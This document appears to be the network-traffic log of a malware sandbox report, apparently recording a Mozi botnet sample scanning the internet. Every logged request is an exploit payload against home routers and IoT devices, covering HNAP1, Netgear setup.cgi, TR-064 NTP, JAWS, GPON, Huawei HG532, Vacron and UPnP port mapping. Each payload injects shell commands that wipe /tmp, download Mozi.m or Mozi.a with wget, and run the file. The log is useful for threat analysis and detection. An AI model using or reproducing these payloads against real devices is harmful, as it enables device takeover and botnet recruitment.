                                                                        Dec 6, 2024 00:36:55.580403090 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 215.161.47.220:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        80192.168.2.23564489.106.14.12380
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580425024 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        81192.168.2.235850285.46.119.845555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580450058 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        82192.168.2.233562426.112.167.5480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580476046 CET280OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 26.112.167.54:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        83192.168.2.2354806121.86.29.24980
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580497026 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        84192.168.2.2345614135.20.150.2195555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580528021 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        85192.168.2.234029477.113.216.768080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580547094 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        86192.168.2.234090491.191.108.13437215
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580580950 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                        Host: 91.191.108.134:37215
                                                                        Content-Length: 601
                                                                        Connection: keep-alive
                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        87192.168.2.2349888171.79.125.1918080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580605984 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        88192.168.2.2336408157.88.62.3580
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580630064 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        89192.168.2.2347728184.242.24.21080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580657959 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 184.242.24.210:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        90192.168.2.2360758178.165.8.797574
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580687046 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:7574
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        91192.168.2.234017027.18.230.1395555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580715895 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        92192.168.2.2345060176.86.103.2949152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580754995 CET931OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 176.86.103.29:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        93192.168.2.2352826182.208.230.2448080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580779076 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        94192.168.2.235503068.175.16.14480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580807924 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 68.175.16.144:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        95192.168.2.2335532115.248.132.478080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580833912 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
